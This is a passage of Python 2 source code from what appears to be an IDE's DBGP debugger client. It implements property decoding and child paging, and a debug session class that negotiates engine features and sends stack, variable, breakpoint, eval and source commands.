return s.decode("utf-8")
except UnicodeDecodeError:
try:
return s.decode('latin1')
except:
proplog.exception("property.%s: Failed to convert %r", value, context)
return s
# These methods are XPCOM getters. Use methods to allow converting
# them into Unicode strings as they're AString values in the IDL.
def get_value(self):
return self._ensure_unicode(self.value, "value")
def get_name(self):
return self._ensure_unicode(self.name, "name")
def get_fullname(self):
return self._ensure_unicode(self.fullname, "fullname")
def initWithNode(self, session, node, context = 0, depth = 0):
self.session = session
# name="%s" fullname="%s" type="%s" children="%d" size="%d"
# if children:
# page="%d" pagesize="%d" numchildren="%d"
# if string type:
# encoding="%s"
self.contextId = context
self.depth = depth
if node.hasAttribute('name'):
self.name = self._decode_unicode_or_byte_string(node.getAttribute('name'),
'name')
if node.hasAttribute('fullname'):
self.fullname = self._decode_unicode_or_byte_string(node.getAttribute('fullname'),
'fullname')
if node.hasAttribute('classname'):
self.classname = node.getAttribute('classname')
if node.hasAttribute('encoding'):
self.encoding = node.getAttribute('encoding')
proplog.debug("property encoding is %s", self.encoding)
for child in node.childNodes:
if child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'name':
self.name = self._getCData(child)
elif child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'fullname':
self.fullname = self._getCData(child)
elif child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'classname':
self.classname = self._getCData(child)
elif child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'value':
self.value = self._getCData(child)
self.type = node.getAttribute('type')
if session and self.type in session._typeMap:
self.typeName = session._typeMap[self.type].commonType
self.typeScheme = session._typeMap[self.type].schemaType
else:
self.typeName = self.type
if node.hasAttribute('size'):
self.size = int(node.getAttribute('size'))
if node.hasAttribute('children'):
self.children = int(node.getAttribute('children'))
if self.children:
self.numchildren = 0
page = 0
pagesize = 0
if node.hasAttribute('page'):
page = int(node.getAttribute('page'))
if node.hasAttribute('pagesize'):
pagesize = int(node.getAttribute('pagesize'))
if node.hasAttribute('numchildren'):
self.numchildren = int(node.getAttribute('numchildren'))
index = page * pagesize
for child in node.childNodes:
if child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'property':
p = property()
p.initWithNode(self.session, child, self.contextId, self.depth)
self.childProperties.insert(index, p)
index = index + 1
if node.hasAttribute('key'):
self.key = node.getAttribute('key')
if node.hasAttribute('address'):
self.address = node.getAttribute('address')
# we may have more than one text node, get them all
if not self.value:
self.value = self._getCData(node)
self.node = node
def __repr__(self):
return "name: %s type: %s value: %s" % \
(self.name, self.type, self.value)
#void getChildren(in long page,
# [array, size_is(count)] out koIDBGPProperty properties,
# out PRUint32 count);
def getChildren(self, page):
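        # Children come back one page at a time (page size = the engine's
        # max_children feature); pages not yet cached are fetched lazily via
        # propertyGetEx before the requested slice is returned.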
pagesize = self.session.maxChildren
start = page * pagesize
end = start + pagesize
if end >= self.numchildren:
end = self.numchildren
proplog.debug("getChildren num %d start %r end %r have %r",
self.numchildren, start, end, len(self.childProperties))
if end > len(self.childProperties):
proplog.debug("getChildren getting children")
p = self.session.propertyGetEx(self.contextId,
self.depth,
self.fullname,
0,
'',
page)
            # property is a duplicate of self. we need to copy its
            # children into ours
s = p.childProperties
s.reverse()
index = start
while s:
self.childProperties.insert(index, s.pop())
index = index + 1
proplog.debug("getChildren returning %d children", len(self.childProperties[start:end]))
return self.childProperties[start:end]
def getChildrenNextPage(self):
if len(self.childProperties) >= self.numchildren:
return None
import math
page = long(math.floor(len(self.childProperties) / self.session.maxChildren))
return self.getChildren(page)
def getAvailableChildren(self):
return self.childProperties
#void getAllChildren([array, size_is(count)] out koIDBGPProperty properties,
# out PRUint32 count);
def getAllChildren(self):
page = 0
# self.childProperties = []
while len(self.childProperties) < self.numchildren:
#proplog.debug("getAllChildren getPage %d", page)
if not self.getChildren(page):
break
page = page + 1
return self.childProperties
def setValue(self, value, type):
prop = self.session.propertyUpdate(self, value, type)
if prop:
self.type = prop.type
self.typeName = prop.typeName
self.typeScheme = prop.typeScheme
self.classname = prop.classname
self.facets = prop.facets
self.size = prop.size
self.children = prop.children
self.numchildren = prop.numchildren
self.address = prop.address
self.recursive = prop.recursive
self.encoding = prop.encoding
self.key = prop.key
self.value = prop.value
self.node = prop.node
self.childProperties = prop.childProperties
self.contextId = prop.contextId
self.depth = prop.depth
def getValue(self):
if self.size > len(self.value):
self.value = self.session.propertyValueEx(self.contextId, self.depth, self.fullname)
return self.value
_MAX_VALUE_LEN = 160
def getTooltip(self, maxTooltipLength):
if self._tooltip is None:
value = self.value
if self.numchildren > 0:
# It's a container object - show a map of child items.
values = [""]
tooltip_length = 0
if len(self.childProperties) == 0:
childProps = self.getChildrenNextPage()
else:
childProps = self.childProperties
while childProps:
for child in childProps:
childValue = self.session.propertyValue(child.fullname)
if len(childValue) > self._MAX_VALUE_LEN:
childValue = childValue[:self._MAX_VALUE_LEN] + "..."
child_tooltip = "%s: %s" % (child.name, childValue)
values.append(child_tooltip)
tooltip_length += len(child_tooltip)
if tooltip_length >= maxTooltipLength:
break
if tooltip_length >= maxTooltipLength:
break
# Load another page of children.
childProps = self.getChildrenNextPage()
value = "\n\t".join(values)
if len(value) > maxTooltipLength:
value = value[:maxTooltipLength] + "\n\t..."
if self.type:
self._tooltip = "%s (%s): %s" % (self.name, self.type, value)
else:
self._tooltip = "%s: %s" % (self.name, value)
return self._tooltip
class session(dbgp.serverBase.session):
def __init__(self, sessionHost):
dbgp.serverBase.session.__init__(self, sessionHost)
# setup some event vars
self._resp_cv = threading.Condition()
self._responses = {}
self.statusName = 'stopped'
self.reason = 'ok'
self.applicationId = None
self.threadId = None
self.parentId = None
self.hostname = ""
self._application = None
self._features = {}
self._supportedCommands = {}
self._typeMap = {}
self.supportsAsync = 0
self.supportsHiddenVars = 0
self.supportsPostmortem = 0
self._resume = 0
self.languageName = ''
self.languageVersion = ''
self.maxChildren = 0
self.interactivePrompt = ''
self.interactiveState = 0
def _dispatch(self, size,response):
# THREAD WARNING
# this function is called from the command loop thread. Do
# not do anything here that will result in another command
# being sent to the client, that will result in a lockup
if size != len(response):
raise DBGPError("Data length is not correct %d != %d" % (size,len(response)))
#log.debug(response)
dom = minidom.parseString(response)
root = dom.documentElement
packetType = root.localName
if packetType == 'stream':
type = root.getAttribute('type').lower()
text = ''
nodelist = root.childNodes
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
text = text + node.data
elif node.nodeType == node.CDATA_SECTION_NODE:
# Xdebug sends stdout in a cdata node - bug 77914.
text = text + node.data
text = base64.decodestring(text)
self._application.outputHandler(type, text)
elif packetType == 'response':
command = root.getAttribute('command')
self._responseHandler(root)
if command in ['stop','detach']:
if command == 'stop':
self._application.shutdown()
else:
self._application.releaseSession(self)
try:
if self._socket: # socket may already be closed.
self._socket.close()
finally:
self._socket = None
self._stop = 1
if command in ['run', 'step_into', 'step_over',
'step_out', 'stop', 'detach', 'interact', 'break']:
# any response command can initiate an interactive prompt
# if it includes the prompt and more attributes
if root.hasAttribute('more') and root.hasAttribute('prompt'):
self.interactiveState = int(root.getAttribute('more'))
self.interactivePrompt = root.getAttribute('prompt')
else:
self.interactivePrompt = ''
self.interactiveState = 0
self._resume = 0
# XXX notify state change now
self.stateChange(root)
return
elif packetType == 'notify':
name = root.getAttribute('name').lower()
text = ''
encoding = None
nodelist = root.childNodes
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
text = text + node.data
if root.hasAttribute('encoding'):
                encoding = root.getAttribute('encoding')
try:
if text and encoding == 'base64':
text = base64.decodestring(text)
except:
pass
#print "doing notify %s %s" %(name, text)
self.notify(name, text, root)
elif packetType == 'init':
# we need to do some initialization commands, but we
# cannot do that from this thread, which is currently
# the cmdloop thread, because it would cause a deadlock.
# this is a short lived thread, so should be fine
log.debug('starting init thread')
t = threading.Thread(target=self.initFeatures, args=(root,),
name="dbgp initFeatures")
t.setDaemon(True)
t.start()
def initFeatures(self, initNode):
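        # Pull session/application identifiers from the init packet, probe the
        # engine for optional features (async support, language info, size
        # limits, optional commands) while tolerating anything unsupported,
        # then set breakpoints and notify the session host.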
# get our init information
self.applicationId = initNode.getAttribute('appid')
self.threadId = initNode.getAttribute('thread')
self.parentId = initNode.getAttribute('parent')
self.cookie = initNode.getAttribute('session')
self.idekey = initNode.getAttribute('idekey')
# If the client has set a specific hostname setting, then use it,
# else we default to the socket connection address.
if initNode.hasAttribute("hostname"):
self.hostname = initNode.getAttribute('hostname')
else:
self.hostname = self._clientAddr[0]
# we're now in a starting status. force feed this
# so that commands are not queued during startup
self.statusName = 'starting'
if initNode.hasAttribute('interactive'):
self.statusName = 'interactive'
self.interactivePrompt = initNode.getAttribute('interactive')
#log.debug("setting initial interactove prompt to %s", self.interactivePrompt)
# let the world know we're here
if not self._sessionHost.initHandler(self, initNode):
# we've closed the session
return
if initNode.hasAttribute('type') and initNode.getAttribute('type') == 'code_profiling':
# Code profiling data - just ask the client for the profile data.
log.debug("type is 'code_profiling' - so fetching the data")
profile_data = self.getProfileData()
log.debug('len(profile_data): %r', len(profile_data))
self._application.codeProfileHandler(self, profile_data)
self.stop()
return
# gather some necessary information for this session
# any information we need during an async operation needs
        # to be retrieved prior to async commands being done
# we can ignore the error that is raised when something
# is not supported
log.debug('init thread running')
try:
self.supportsAsync = int(self.featureGet('supports_async'))
except Exception, e:
log.debug('init thread supportsAsync unknown')
if self._stop: return
try:
self.languageName = self.featureGet('language_name')
except Exception, e:
log.debug('init thread languageName unknown')
if self._stop: return
try:
self.languageVersion = self.featureGet('language_version')
except Exception, e:
log.debug('init thread languageVersion unknown')
if self._stop: return
try:
self.maxChildren = int(self.featureGet('max_children'))
except Exception, e:
self.maxChildren = 0
log.debug('init thread maxChildren unknown')
if self._stop: return
try:
self.maxData = int(self.featureGet('max_data'))
except Exception, e:
self.maxData = 0
log.debug('init thread maxData unknown')
if self._stop: return
try:
self.maxDepth = int(self.featureGet('max_depth'))
except Exception, e:
self.maxDepth = 0
log.debug('init thread maxDepth unknown')
if self._stop: return
try:
self.featureGet('show_hidden')
self.supportsHiddenVars = 1
except Exception, e:
self.supportsHiddenVars = 0
log.debug('init supportsHiddenVars false')
if self._stop: return
try:
self.featureGet('supports_postmortem')
self.supportsPostmortem = 1
except Exception, e:
self.supportsPostmortem = 0
log.debug('init supportsPostmortem false')
if self._stop: return
try:
self.featureSet('multiple_sessions', '1')
except Exception, e:
log.debug('init thread multiple_sessions unknown')
if self._stop: return
try:
# let the engine know it can send us notifications
self.featureSet('notify_ok', '1')
except Exception, e:
log.debug('engine does not support notifications')
if self._stop: return
try:
self._supportsOptionalCommand('break')
except Exception, e:
log.debug('init thread break unknown')
if self._stop: return
try:
self._supportsOptionalCommand('eval')
except Exception, e:
log.debug('init thread eval unknown')
if self._stop: return
try:
self._supportsOptionalCommand('stdin')
except Exception, e:
log.debug('init thread stdin unknown')
if self._stop: return
try:
self._supportsOptionalCommand('detach')
except Exception, e:
log.debug('init thread detach unknown')
if self._stop: return
try:
self._supportsOptionalCommand('interact')
except Exception, e:
log.debug('does not support interactive debugger')
if self._stop: return
try:
self.breakpointLanguages = [l.lower() for l in self.featureGet('breakpoint_languages').split(',')]
except Exception, e:
if self._stop: return
self.breakpointLanguages = [self.languageName]
log.debug('init thread breakpoint_languages %r', self.breakpointLanguages)
try:
self._getTypeMap()
except Exception, e:
log.error('unable to retrieve typeMap from client')
if self._stop: return
# pass the url mapping to the engine
try:
if self._supportsOptionalCommand('urimap'):
maps = self._sessionHost.getURIMappings()
for map in maps:
self.featureSet('urimap', map)
except Exception, e:
log.debug('client does not support urimap feature')
if self._stop: return
# grab the breakpoint list now
try:
# some languages, eg. Tcl, have to do some processing before
# breakpoints are set. This notification allows hooks to be
# added for that purpose
if self._application and self._application.sessionCount() == 1:
self._sessionHost.notifyStartup(self, initNode)
err = self._sessionHost.breakpointManager.setSessionBreakpoints(self)
#XXX Should, ideally, show this error to the user somehow. Ideas:
# - pop up a dialog and offer to cancel debugging?
# - status bar message?
# - display the breakpoint/spawnpoint markers slightly
# differently and remember this data so that the properties
# page for the breakpoint shows that this is not set on
# the session
if err:
log.error("the following breakpoints/spawnpoints could not "
"be set on this session:\n%s" % err)
except Exception, e:
log.error('breakpoints failed to be set properly')
pass
if not self._stop:
# are we a new thread in the app? If so, then just do
# the run command now
if self._application and self._application.sessionCount() > 1:
self.resume(RESUME_GO)
# no notifyInit for threads in an app
return
self._sessionHost.notifyInit(self, initNode)
def notify(self, name, text, node):
# "node" is the reponse node from the last continuation command
#
# THREAD WARNING
# this function is called from the command loop thread. Do
# not do anything here that will result in another command
# being sent to the client, that will result in a lockup
# we were running, now we're at a break, or stopping
log.info('session notify %s:%s name %s data %s',
self.applicationId,
self.threadId,
name, text)
def stateChange(self, node):
# "node" is the reponse node from the last continuation command
#
# THREAD WARNING
# this function is called from the command loop thread. Do
# not do anything here that will result in another command
# being sent to the client, that will result in a lockup
# we were running, now we're at a break, or stopping
if node:
self.statusName = node.getAttribute('status')
self.reason = node.getAttribute('reason')
log.info('session %s:%s state %s',
self.applicationId,
self.threadId,
self.statusName)
def addApplication(self, app):
log.debug('setting session application')
self._application = app
def removeApplication(self):
# [TM] Basically this is a poorly named session.finalize().
log.debug('removing session application')
# Tell the breakpoint manager that this debug session is shutting
# down.
self._sessionHost.breakpointManager.releaseSession(self)
# don't remove the application var, just let the thread
# know it should stop.
self._stop = 1
def _responseHandler(self, node):
tid = None
if node.hasAttribute('transaction_id'):
tid = int(node.getAttribute('transaction_id'))
if not tid:
raise DBGPError('response without a transaction id')
self._responses[tid] = node
self._resp_cv.acquire()
self._resp_cv.notify()
self._resp_cv.release()
def sendCommandWait(self, argv, data = None, timeout = 5):
if self._stop:
raise DBGPError('command sent after session stopped')
tid = self.sendCommand(argv, data)
node = self._waitResponse(tid, timeout)
err = node.getElementsByTagName('error')
if err:
errcode = err[0].getAttribute('code')
msgnode = err[0].getElementsByTagName('message')
msg = ''
if msgnode:
for child in msgnode[0].childNodes:
msg = msg + child.nodeValue
if errcode:
errcode = int(errcode)
raise DBGPError(msg, errcode)
return node
def waitResponse(self, tid, timeout=5):
return self._waitResponse(tid, timeout)
def _waitResponse(self, tid, timeout=5):
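        # Poll for the response keyed by transaction id, waiting on the
        # condition variable in 1-second increments for up to `timeout`
        # seconds (a falsy timeout waits indefinitely).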
ticks = 0
while not timeout or ticks < timeout:
if tid in self._responses:
resp = self._responses[tid]
del self._responses[tid]
return resp
# XXX need the timeout here to prevent lockups
# with tcl 11/25/03
#if self._stop:
ticks += 1
self._resp_cv.acquire()
self._resp_cv.wait(1)
self._resp_cv.release()
raise DBGPError('session timed out while waiting for response')
def updateStatus(self):
node = self.sendCommandWait(['status'])
self.statusName = node.getAttribute('status')
self.reason = node.getAttribute('reason')
#/* status values */
#readonly attribute long status;
#readonly attribute long reason;
def getLastError(self):
pass
def getBreakpointLanguages(self):
return self.breakpointLanguages
#/* feature commands */
#wstring featureGet(in wstring name);
def featureGet(self, name):
self._supportsAsync()
node = self.sendCommandWait(['feature_get', '-n', name])
supported = node.getAttribute('supported')
if not supported or not long(supported):
raise DBGPError('Feature %s not supported' % name)
value = ''
for child in node.childNodes:
if child.nodeType in [node.TEXT_NODE, node.CDATA_SECTION_NODE]:
value += child.nodeValue
isBase64 = node.hasAttribute('encoding') and \
node.getAttribute('encoding') == 'base64'
if isBase64:
try:
value = base64.decodestring(value)
except:
pass
return value or 0
#boolean featureSet(in wstring name, in wstring value);
def featureSet(self, name, value):
self._supportsAsync()
node = self.sendCommandWait(['feature_set', '-n', name, '-v', str(value)])
if not node.hasAttribute('success') or not int(node.getAttribute('success')):
raise DBGPError('Unable to set feature %s' % name)
return 1
def _supportsAsync(self):
#if self.supportsAsync is None:
# try:
# node = self.sendCommandWait(['feature_get', '-n', 'supports_async'])
# self.supportsAsync = int(node.getAttribute('supported'))
# except DBGPError, e:
# self.supportsAsync = 0
if not self.supportsAsync and self._resume > 0:
raise DBGPError('Asynchronous commands are not supported')
def _supportsOptionalCommand(self, commandName):
if commandName not in self._supportedCommands:
try:
self.featureGet(commandName)
self._supportedCommands[commandName] = 1
except DBGPError, e:
log.debug("command [%s] is not supported by debugger", commandName)
self._supportedCommands[commandName] = 0
return self._supportedCommands[commandName]
def _noAsync(self, commandName):
        # Assert that this command is not being called asynchronously (i.e.
# this command is being called in a break state).
if self._resume > 0:
raise DBGPError('Cannot issue command [%s] asynchronously' % commandName)
#/* continuation commands */
#boolean resume(in long resumeAction);
def resume(self, action):
if self._resume > 0:
raise DBGPError('Session already in resume state %d' % self._resume)
# Notify breakpoint manager in case it has queue up
# breakpoint/spawnpoint updates to send on to the session.
self._sessionHost.breakpointManager.sendUpdatesToSession(self)
self._resume = action
self.statusName = 'running'
self.sendCommand([resume_command_names[self._resume]])
# set the status to running
#self.stateChange(None)
return 1
#boolean break();
def breakNow(self):
self._supportsAsync()
self.sendCommand(['break'])
#boolean stop();
def stop(self):
# we cannot wait for a response here, as sometimes apps close
# before we can read the response off the socket.
tid = self.sendCommand(['stop'])
return 1
#boolean detach();
def detach(self):
if not self._supportsOptionalCommand('detach'):
log.debug('client does not support detach!')
return 0
# we cannot wait for a response here, as sometimes apps close
# before we can read the response off the socket.
tid = self.sendCommand(['detach'])
return 1
#wstring interact(in wstring command);
def interact(self, command):
self._supportsAsync()
if not self._supportsOptionalCommand('interact'):
log.debug('client does not support interact!')
return 0
self.statusName = 'running'
# turn off interactive mode. It gets turned on again when we receive
# the response to this command. It needs to be turned off because we
        # might receive stdin requests before we receive an interact response.
# We also must do this before sending the command to avoid the
# response happening before we turn this off (threads, happy happy joy joy)
self.interactivePrompt = ''
if command is None:
tid = self.sendCommand(['interact', '-m', '0'])
else:
tid = self.sendCommand(['interact', '-m', '1'], command.encode('utf-8'))
return tid
#/* stack commands */
#long stackDepth();
def stackDepth(self):
self._noAsync('stack_depth')
node = self.sendCommandWait(['stack_depth'])
return node.getAttribute('depth')
#koIDBGPStackFrame stackGet(in long depth);
def stackGet(self, depth):
self._noAsync('stack_get')
node = self.sendCommandWait(['stack_get', '-d', str(depth)])
for child in node.childNodes:
if child.nodeType != node.ELEMENT_NODE or child.tagName != 'stack': continue
frame = stackFrame()
frame.initWithNode(child)
return frame
return None
#void stackFramesGet([array, size_is(count)] out koIDBGPStackFrame frames,
# out PRUint32 count);
def stackFramesGet(self):
self._noAsync('stack_get')
node = self.sendCommandWait(['stack_get'])
frames = []
children = node.getElementsByTagName('stack')
for child in children:
frame = stackFrame()
frame.initWithNode(child)
frames.append(frame)
return frames
#/* context commands */
#void contextNames([retval, array, size_is(count)] out koIDBGPContextType contextTypes,
# [optional] out PRUint32 count);
def contextNames(self):
self._noAsync('context_names')
node = self.sendCommandWait(['context_names'])
contextList = []
children = node.getElementsByTagName('context')
for child in children:
context = contextType()
context.initWithNode(child)
contextList.append(context)
return contextList
#void contextGet(in long id,
# [array, size_is(count)] out koIDBGPProperty properties,
# out PRUint32 count);
def contextGet(self, contextId, depth):
self._noAsync('context_get')
# Need a long timeout since at least Google Chrome takes a while to send
# back global variables.
node = self.sendCommandWait(['context_get', '-c', str(contextId), '-d', str(depth)], timeout=30)
propertyList = []
for child in node.childNodes:
if child.nodeType == minidom.Node.ELEMENT_NODE and \
child.tagName == 'property':
p = property()
p.initWithNode(self, child, contextId, depth)
propertyList.append(p)
return propertyList
#/* property commands */
#koIDBGPProperty propertyGet(in long contextId,
# in long stackDepth,
# in wstring fullname,
# in long maxData,
# in long dataType,
# in long dataPage);
def propertyGet(self, fullname):
return self.propertyGetEx(0, 0, fullname, 0, '', 0)
def propertyGetEx(self, contextId, stackDepth, fullname, maxData, dataType, dataPage, address=""):
# This can fire with a hover tip while the program is running, so
# ignore it.
if self._resume > 0:
return
cmd = ['property_get', '-c', str(contextId),
'-d', str(stackDepth), '-n', fullname]
if maxData:
cmd += ['-m', str(maxData)]
if dataType:
cmd += ['-t', dataType]
if dataPage:
cmd += ['-p', str(dataPage)]
if address and len(address) > 0:
cmd += ['-a', str(address)]
try:
node = self.sendCommandWait(cmd)
p = property()
p.initWithNode(self, node.firstChild, contextId, stackDepth)
except DBGPError, e:
# create an empty var with the exception for the value
p = property()
p.session = self
p.context = contextId
p.depth = stackDepth
p.fullname = fullname
p.name = fullname
p.value = getErrorInfo(e)[1]
p.type = 'exception'
return p
#koIDBGPProperty propertySet(in long contextId,
# in long stackDepth,
# in wstring name,
# in wstring value);
def propertySet(self, name, value):
return self.propertySetEx(0, 0, name, value)
def propertySetEx(self, contextId, stackDepth, name, value):
self._noAsync('property_set')
args = ['property_set', '-c', str(contextId), '-d',
str(stackDepth), '-n', name]
node = self.sendCommandWait(args, value)
if node.hasAttribute('success'):
if int(node.getAttribute('success')):
return self.propertyGetEx(contextId, stackDepth, name, 0, '', 0)
else:
raise DBGPError("Unable to set the property value.")
return None
def propertyUpdate(self, prop, value, type):
self._noAsync('property_set')
args = ['property_set', '-c', str(prop.contextId), '-d',
str(prop.depth), '-n', prop.fullname]
if prop.key:
args += ['-k', prop.key]
if prop.address:
prop_address = prop.address
args += ['-a', prop_address]
else:
prop_address = ""
if type:
args += ['-t', type]
node = self.sendCommandWait(args, value)
if node.hasAttribute('success'):
if int(node.getAttribute('success')):
return self.propertyGetEx(prop.contextId, prop.depth, prop.fullname, 0, '', 0, prop_address)
else:
raise DBGPError("Unable to update the variable.")
return None
#wstring propertyValue(in long contextId,
# in long stackDepth,
# in wstring name);
def propertyValue(self, name):
return self.propertyValueEx(0, 0, name)
def propertyValueEx(self, contextId, stackDepth, name):
self._noAsync('property_value')
args = ['property_value', '-c', str(contextId), '-d',
str(stackDepth), '-n', name]
node = self.sendCommandWait(args)
encoding = None
if node.hasAttribute('encoding'):
encoding = node.getAttribute('encoding')
value = ''
# we may have more than one text node, get them all
for child in node.childNodes:
if child.nodeType in [minidom.Node.TEXT_NODE,
minidom.Node.CDATA_SECTION_NODE]:
value = value + child.nodeValue
try:
if value and encoding == 'base64':
value = base64.decodestring(value)
except:
pass
return value
#---- breakpoint commands
def breakpointSet(self, bp):
"""Set the given breakpoint on this session.
Returns the session's assigned ID (a string) for the new breakpoint.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointSet(bp='%s')", bp.getName())
self._supportsAsync()
bpargs, bpdata = bp.getSetArgs()
args = ["breakpoint_set"] + bpargs
node = self.sendCommandWait(args, bpdata)
return node.getAttribute("id")
def breakpointUpdate(self, bpid, bp, attrs=None):
"""Update the given breakpoint.
"bpid" is the session's ID for this breakpoint.
"bp" is a breakpoint instance from which to update
"attrs" (optional) is a list of attributes that are meant to be
updated. If None (or the empty list), then all attributes
are updated.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointUpdate(bpid=%r, bp='%s', attrs=%r)",
bpid, bp.getName(), attrs)
self._supportsAsync()
args = ["breakpoint_update", "-d", str(bpid)]
if not attrs: # False means update all supported attributes.
args += ["-s", bp.state]
args += ["-n", str(bp.lineno)]
args += ["-h", str(bp.hitValue)]
if bp.hitCondition:
args += ["-o", bp.hitCondition]
args += ["-r", str(int(bp.temporary))]
else: # Only update the specified attributes.
for attr in attrs:
if attr == "state":
args += ["-s", bp.state]
elif attr == "lineno":
args += ["-n", str(bp.lineno)]
elif attr == "hitValue":
args += ["-h", str(bp.hitValue)]
elif attr == "hitCondition":
args += ["-o", bp.hitCondition]
elif attr == "temporary":
args += ["-r", str(int(bp.temporary))]
        if bp.type == 'conditional':
bpdata = bp.expression
else:
bpdata = None
bplog.debug("session %r: '%r', data='%r'", (self.applicationId, self.threadId), args, bpdata)
node = self.sendCommandWait(args, bpdata)
def breakpointGet(self, bpid):
"""Get the breakpoint with the given session breakpoint id.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointGet(bpid=%r)", bpid)
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_get", "-d", str(bpid)])
children = node.getElementsByTagName("breakpoint")
if not children:
return None
bp = breakpoint()
bp.initWithNode(children[0])
return bp
def breakpointEnable(self, bpid):
"""Enable the breakpoint with the given session breakpoint id.
NOTE: This command is OBSOLETE. Use breakpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointEnable(bpid=%r)", bpid)
self._supportsAsync()
self.sendCommandWait(["breakpoint_enable", "-d", str(bpid)])
def breakpointDisable(self, bpid):
"""Disable the breakpoint with the given session breakpoint id.
NOTE: This command is OBSOLETE. Use breakpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointDisable(bpid=%r)", bpid)
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_disable", "-d", str(bpid)])
def breakpointRemove(self, bpid):
"""Remove the breakpoint with the given session breakpoint id.
Raises a DBGPError if the command fails.
"""
bplog.debug("session.breakpointRemove(bpid=%r)", bpid)
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_remove", "-d", str(bpid)])
def breakpointList(self):
"""Return a list of all breakpoints for this session.
Raises a DBGPError if the command fails.
"""
self._supportsAsync()
node = self.sendCommandWait(["breakpoint_list"])
children = node.getElementsByTagName("breakpoint")
breakpoints = []
for child in children:
bp = breakpoint()
bp.initWithNode(child)
breakpoints.append(bp)
return breakpoints
#---- spawnpoint commands
def spawnpointSet(self, sp):
"""Set the given spawnpoint on this session.
Returns the session's assigned ID (a string) for the new spawnpoint.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_set")
spArgs, spData = sp.getSetArgs()
args = ["spawnpoint_set"] + spArgs
node = self.sendCommandWait(args, spData)
return node.getAttribute("id")
def spawnpointUpdate(self, spid, sp, attrs=None):
"""Update the given spawnpoint.
"spid" is the session's ID for this spawnpoint.
"sp" is a spawnpoint instance from which to update
"attrs" (optional) is a list of attributes that are meant to be
updated. If None, then all attributes are updated.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_update")
args = ["spawnpoint_update", "-d", spid]
if attrs is None: # None means update all supported attributes.
args += ["-s", str(sp.state)]
args += ["-n", str(sp.lineno)]
else: # Only update the specified attributes.
for attr in attrs:
if attr == "state":
args += ["-s", str(sp.state)]
elif attr == "lineno":
args += ["-n", str(sp.lineno)]
node = self.sendCommandWait(args)
def spawnpointGet(self, spid):
"""Get the spawnpoint with the given session spawnpoint id.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_get")
node = self.sendCommandWait(["spawnpoint_get", "-d", str(spid)])
children = node.getElementsByTagName("spawnpoint")
if not children:
return None
sp = spawnpoint()
sp.initWithNode(children[0])
return sp
def spawnpointEnable(self, spid):
"""Enable the spawnpoint with the given session spawnpoint id.
NOTE: This command is OBSOLETE. Use spawnpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_enable")
self.sendCommandWait(["spawnpoint_enable", "-d", str(spid)])
def spawnpointDisable(self, spid):
"""Disable the spawnpoint with the given session spawnpoint id.
NOTE: This command is OBSOLETE. Use spawnpointUpdate() instead.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_disable")
node = self.sendCommandWait(["spawnpoint_disable", "-d", str(spid)])
def spawnpointRemove(self, spid):
"""Remove the spawnpoint with the given session spawnpoint id.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_remove")
node = self.sendCommandWait(["spawnpoint_remove", "-d", str(spid)])
def spawnpointList(self):
"""Return a list of all spawnpoints for this session.
Raises a DBGPError if the command fails.
"""
self._noAsync("spawnpoint_list")
node = self.sendCommandWait(["spawnpoint_list"])
children = node.getElementsByTagName("spawnpoint")
spawnpoints = []
for child in children:
sp = spawnpoint()
sp.initWithNode(child)
spawnpoints.append(sp)
return spawnpoints
#/* eval */
#koIDBGPProperty evalString(in wstring expression);
def evalString(self, expression):
self._noAsync('eval')
l = len(expression)
try:
node = self.sendCommandWait(['eval', '-l', str(l)], expression)
pnodes = node.getElementsByTagName('property')
if pnodes:
p = property()
p.initWithNode(self, pnodes[0])
p.name = expression
return p
except DBGPError, e:
# create an empty var with the exception for the value
p = property()
p.session = self
p.context = 0
p.depth = 0
p.fullname = expression
p.name = expression
p.value = getErrorInfo(e)[1]
p.type = 'exception'
return p
return None
def _getTypeMap(self):
self._noAsync('typemap_get')
node = self.sendCommandWait(['typemap_get'])
self._typeMap = {}
children = node.getElementsByTagName('map')
for child in children:
typ = dataType()
typ.initWithNode(child)
self._typeMap[typ.languageType] = typ
#void getTypeMap([array, size_is(count)] out koIDBGPDataType dateTypes,
# out PRUint32 count);
def getTypeMap(self):
if not self._typeMap:
self._getTypeMap()
return self._typeMap.values()
def getDataType(self, commonType):
for typ in self.getTypeMap():
if typ.commonType == commonType:
return typ
return None
## Gets the sourcecode for the named file.
#wstring getSourceCode(in wstring filename);
def getSourceCode(self, filename, startline, endline):
self._noAsync('source')
cmd = ['source']
if filename:
cmd += ['-f', filename]
if startline:
cmd += ['-b', str(startline)]
if endline:
cmd += ['-e', str(endline)]
node = self.sendCommandWait(cmd)
text = ''
for c in node.childNodes:
text = text + c.nodeValue
try:
text = base64.decodestring(text)
except:
pass
return text
def getProfileData(self):
self._noAsync('profile_data')
cmd = ['profile_data']
node = self.sendCommandWait(cmd)
text = ''
for c in node.childNodes:
text = text + c.nodeValue
try:
text = base64.decodestring(text)
except:
pass
if node.hasAttribute('datatype') and \
node.getAttribute('datatype') == 'zip':
# The profile information is wrapped inside a zip archive.
try:
from zipfile import ZipFile
from cStringIO import StringIO
zipfile = StringIO(text)
z = ZipFile(zipfile)
assert len(z.filelist) == 1
filename = z.filelist[0]
text = z.read(filename)
except:
# TODO: Properly handle and notify any errors.
pass
return text
#sendStdin(in wstring data, in long size);
def sendStdin(self, data, size):
if not self._supportsOptionalCommand('stdin'):
log.debug('client does not support stdin!')
return 0
